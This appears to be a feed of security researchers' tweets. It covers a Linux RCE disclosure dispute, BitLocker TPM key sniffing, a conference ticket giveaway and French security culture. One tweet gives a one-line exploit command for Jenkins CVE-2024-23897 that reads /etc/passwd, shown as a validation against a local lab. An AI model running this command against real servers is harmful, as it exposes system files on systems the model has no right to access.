* Unauthenticated RCE vs all GNU/Linux systems (plus others) disclosed 3 weeks ago.
* Full disclosure happening in less than 2 weeks (as agreed with devs).
* Still no CVE assigned (there should be at least 3, possibly 4, ideally 6).
* Still no working fix.
* Canonical, RedHat and others have confirmed the severity, a 9.9, check screenshot.
* Devs are still arguing about whether or not some of the issues have a security impact.
I've spent the last 3 weeks of my sabbatical working full time on this research, reporting, coordination and so on with the sole purpose of helping and pretty much only got patronized because the devs just can't accept that their code is crap - responsible disclosure: no more.
Validating Jenkins CVE-2024-23897 with a quick docker setup from my favorite github.com/vulhub/vulhub resources: java -jar jenkins-cli.jar -s 'http://localhost:8080' connect-node "@/etc/passwd"
Because of the current situation in Israel, we have a few spare tickets for @hexacon_fr and @Cellebrite would be happy to give them away. To take part, just reply to this message and we will pick the winners tomorrow (October 12) in the afternoon.
@jrozner@HockeyInJune LUKS supports these encrypted sessions. This is a BitLocker "flaw" possibly explained by the fact that it came out before TPM and changing the behaviour might cause retrocompatibility issues. Although it stays a "turtles all the way down" problem, snooping becomes harder
@_gquere@HockeyInJune It’s very possible the TPM protocol addresses this but I don’t know it to know whether it does. However, encryption alone doesn’t fix it, especially if it doesn’t include mutual authentication. 1/n
FDE has always been a checkbox. Will this research change that?
errno.fr/BypassingBitlo…
Everything from SEDs to TPMs can be decapped or bypassed. SecureBoot (if enabled properly) could prevent a modified OS from booting, but it won't prevent copying the unencrypted drive.
@jrozner@HockeyInJune I'm no expert but one could argue that FVEK is a more important secret than VMK since it cannot be changed without re-encrypting the whole disk. Rekeying should be done by changing the VMK. Also this would be easily solved if communications between the PCH and TPM were encrypted
@HockeyInJune At least if the VMK never leaves the TPM transport layer encryption could theoretically be added to protect the clear text key in transit and a malicious/compromised processor can't request the key
@jochenleidner It can be secure if you protect it using a passphrase, but it's rarely the case since it's more user-friendly if the disk auto-decrypts (which is the vulnerability presented here).
@gabrielthierry IT security in France is half a dozen clowns who do the TV panels and 500 solid people who quietly stay unknown to the general public.
You may have seen this far-fetched tale of a French hacker hunted by the CIA go by. Wow, Langley's super spies on the trail of a mere teenager, what a great story. Except that... Spoiler alert: this narrative seems hollow.